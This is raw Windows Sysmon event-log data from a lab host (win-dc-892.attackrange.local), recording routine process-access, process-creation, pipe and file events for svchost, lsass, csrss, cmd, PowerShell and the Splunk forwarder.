12:01:06.408{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002755Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.408{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002754Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:06.408{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002753Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.408{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002752Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:06.408{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002751Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.408{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002750Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:06.408{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002749Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.408{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002748Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:06.408{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-6482-6064-6700-00000000AE01}3748C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002747Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.408{266CAFBE-647D-6064-2F00-00000000AE01}27963792C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6482-6064-6700-00000000AE01}3748C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002746Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.414{266CAFBE-6482-6064-6700-00000000AE01}3748C:\Windows\System32\cmd.exe10.0.14393.0 
(rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinEventLog.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002745Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.346{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-6482-6064-6500-00000000AE01}3228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002744Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:06.346{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-6482-6064-6500-00000000AE01}3228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000002743Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:01:06.330{266CAFBE-6482-6064-6500-00000000AE01}3228\PSHost.132616656662644168.3228.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000002742Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.315{266CAFBE-6482-6064-6500-00000000AE01}3228NT AUTHORITY\SYSTEMC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_abhoevp0.y1w.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002741Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.315{266CAFBE-6482-6064-6500-00000000AE01}3228NT 
AUTHORITY\SYSTEMC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_ce2z1y2p.34u.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000002740Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.299{266CAFBE-6482-6064-6500-00000000AE01}3228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_ce2z1y2p.34u.ps12021-03-31 12:01:06.299 10341000x80000000000000002739Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.299{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-6482-6064-6600-00000000AE01}3832C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002738Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:06.299{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002737Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.299{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002736Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:06.299{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002735Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.299{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002734Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:06.299{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002733Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.299{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002732Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:06.299{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002731Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.299{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002730Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:06.299{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002729Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.299{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-6482-6064-6600-00000000AE01}3832C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002728Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.299{266CAFBE-647D-6064-2F00-00000000AE01}27963792C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6482-6064-6600-00000000AE01}3832C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program 